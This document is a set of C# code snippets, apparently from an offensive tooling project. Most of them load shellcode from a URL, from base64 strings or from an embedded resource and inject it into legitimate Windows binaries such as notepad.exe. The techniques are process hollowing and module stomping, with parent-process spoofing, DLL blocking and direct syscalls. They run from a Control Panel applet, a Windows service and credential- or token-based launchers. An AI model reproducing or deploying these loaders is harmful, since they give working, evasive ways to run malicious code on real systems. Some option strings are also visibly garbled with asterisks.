public static void Flame()
{
string binary = @"";
string url = @"";
byte[] shellcode = GetShellcode(url);
int ppid = FindProcessPid("explorer");
if (ppid != 0)
{
try
{
var hollower = new Hollower();
hollower.Hollow(binary, shellcode, ppid);
}
catch (Exception e)
{
Console.WriteLine(" [x] {0}", e.Message);
}
}
else
{
Environment.Exit(1);
}
}
public unsafe static IntPtr CPlApplet()
{
string scode = ExtractResource("TikiCpl.Resource.txt");
byte[] blob = Convert.FromBase64String(scode);
byte[] shellcode = Generic.DecompressShellcode(blob);
if (shellcode.Length == 0)
{
return(IntPtr.Zero);
}
int ppid = FindProcessPid("explorer");
if (ppid == 0)
{
Environment.Exit(1);
}
try
{
var hollower = new Hollower();
// Change the binary you want to inject shellcode into
string binary = @"C:\windows\system32\upnpcont.exe";
hollower.Hollow(binary, shellcode, ppid);
return(IntPtr.Zero);
}
catch
{
return(IntPtr.Zero);
}
}
private static void Main(string[] args)
{
var parent = Process.GetProcessesByName("explorer")[0];
// Module Stomping
var stomper = new Stomper
{
BinaryPath = @"C:\Windows\System32\notepad.exe",
WorkingDirectory = @"C:\Windows\System32",
ParentId = parent.Id,
BlockDlls = true,
ModuleName = "xpsservices.dll",
ExportName = "DllCanUnloadNow"
};
stomper.Stomp(Shellcode, useSyscalls: true);
// Process Hollowing
var hollower = new Hollower
{
BinaryPath = @"C:\Windows\System32\notepad.exe",
WorkingDirectory = @"C:\Windows\System32",
ParentId = parent.Id,
BlockDlls = true
};
hollower.Hollow(Shellcode, useSyscalls: true);
}
protected override void OnStart(string[] args)
{
try
{
var settings = ConfigurationManager.AppSettings;
string binary = settings["Binary"];
byte[] shellcode = Convert.FromBase64String(settings["Shellcode"]);
var hollower = new Hollower();
hollower.HollowWithoutPid(binary, shellcode);
}
catch
{
//pokemon
}
}
static void Main(string[] args)
{
string binary = null;
string domain = null;
string username = null;
string password = null;
bool help = false;
byte[] shellcode = Generic.DecompressShellcode(Convert.FromBase64String(""));
var options = new OptionSet()
{
{ "d|domain=", "Domain (defaults to local machine)", v => domain = v },
{ "u|username="******"Username", v => username = v },
{ "p|password="******"Password", v => password = v },
{ "b|binary=", "Binary to spawn & inject", v => binary = v },
{ "h|?|help", "Show this help", v => help = true }
};
try
{
options.Parse(args);
if (help || username == null || password == null || binary == null)
{
options.WriteOptionDescriptions(Console.Out);
return;
}
else
{
if (domain == null)
{
domain = ".";
}
var hollower = new Hollower();
hollower.HollowAs(binary, shellcode, domain, username, password);
}
}
catch (Exception e)
{
Console.WriteLine(" [x] {0}", e.Message);
}
}
private void Flame(string binary, string url)
{
byte[] shellcode = GetShellcode(url);
int ppid = FindProcessPid("explorer");
if (ppid != 0)
{
try
{
var hollower = new Hollower();
hollower.Hollow(binary, shellcode, ppid);
}
catch { }
}
else
{
Environment.Exit(1);
}
}
public static void Flame(string shellcode, string binary)
{
int ppid = FindProcessPid("explorer");
byte[] pic = Generic.DecompressShellcode(Convert.FromBase64String(shellcode));
if (ppid != 0)
{
try
{
var hollower = new Hollower();
hollower.Hollow(binary, pic, ppid);
}
catch { }
}
else
{
return;
}
}
static void Main(string[] args)
{
string binary = null;
int elevatedPid = 0;
bool help = false;
byte[] shellcode = Generic.DecompressShellcode(Convert.FromBase64String(""));
var options = new OptionSet()
{
{ "b|binary=", "Binary to spawn & inject", v => binary = v },
{ "p|pid=", "Elevated PID to impersonate (optional)", v => elevatedPid = int.Parse(v) },
{ "h|?|help", "Show this help", v => help = true }
};
try
{
options.Parse(args);
if (help || binary == null)
{
options.WriteOptionDescriptions(Console.Out);
return;
}
else
{
var hollower = new Hollower();
hollower.HollowElevated(binary, shellcode, elevatedPid);
//while (true)
//{
// Thread.Sleep(1000);
//}
}
}
catch (Exception e)
{
Console.WriteLine(" [x] {0}", e.Message);
}
}
